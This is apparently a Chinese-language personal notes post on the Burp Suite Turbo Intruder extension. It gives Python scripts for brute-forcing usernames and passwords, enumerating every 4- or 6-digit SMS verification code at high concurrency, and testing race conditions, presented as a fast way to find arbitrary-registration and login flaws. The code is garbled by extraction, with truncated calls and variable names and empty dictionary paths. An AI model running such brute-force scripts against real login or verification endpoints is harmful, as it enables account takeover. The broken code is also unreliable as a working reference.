Burp-TurboIntruder Turbo Intruder
基础使⽤总结,把Python代码都记录下,要是有啥骚姿势,求各位师傅交流。
视频⾥有讲解底层原理
Install
Extender -> BApp Store -> Turbo Intruder
我是选择的这种办法,⽹太垃圾的原因吧,Store⾥install⼀直装不上
基础使⽤
直接抓取数据包右键发送过去就可以
有上下两块
就拿爆破⽬录来举例吧
要fuzz的点⽤%s来顶上
选择爆破点 -> 加载字典 -> Attack
要看和普通burp⾥的intruder的速度差距⾃⼰试试就知道了哈哈
既然这么快,那么挖掘任意⽤户注册和登录是不是很爽呢,以后补挖掘案例(2020.11.24,12:14)提升速度
想要⼤⼤提升速度,就把pipeline设置成True
pipeline学过http request smuggling的应该都知道是啥了吧(⼿动滑稽)
爆破ur&pass
from urllib import quote
def password_brute(target,engine):
for word in open('F:/Tools/Dict/'):
engine.q, quote(word.rstrip()))
def ur_brute(target,engine):
for word in open('F:/Tools/Dict/'):
engine.q, quote(word.rstrip()))
def ur_password_brute(target, engine):
for password in open('F:/Tools/Dict/'):
for ur in open('F:/Tools/Dict/'):
engine.q, [quote(ur.rstrip()),quote(password.rstrip())])
def queueRequests(target, wordlists):
engine = RequestEngine(dpoint,
concurrentConnections=5,
requestsPerConnection=100,
pipeline=True
)
#ur_brute(target,engine)
#password_brute(target,engine)
ur_password_brute(target,engine)
def handleRespon(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length spon
if req.status == 200:
table.add(req)
if条件可以⾃⼰更改
需要⽤哪个就⽤哪个,不需要就注释
爆破数字验证码
最后的数字假如是4位验证码就传4,6就是6
from itertools import product
def brute_veify_code(target, engine, length):
pattern = '1234567890'
for i in list(product(pattern, repeat=length)):
code = ''.join(i)
engine.q, code)
def queueRequests(target, wordlists):
engine = RequestEngine(dpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=True
)
brute_veify_code(target, engine, 6)
def handleRespon(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length spon
if 'error' not spon:
table.add(req)
不做演⽰了
并发漏洞
这个就直接实战吧哈哈
这⾥有个注意点concurrentConnections和for循环的次数,⼤家⾃⼰尝试哈哈
垃圾接码平台,最后还是⽤的⾃⼰的⼿机号测试的淦
写个笔记还浪费我的短信费哭了呜呜
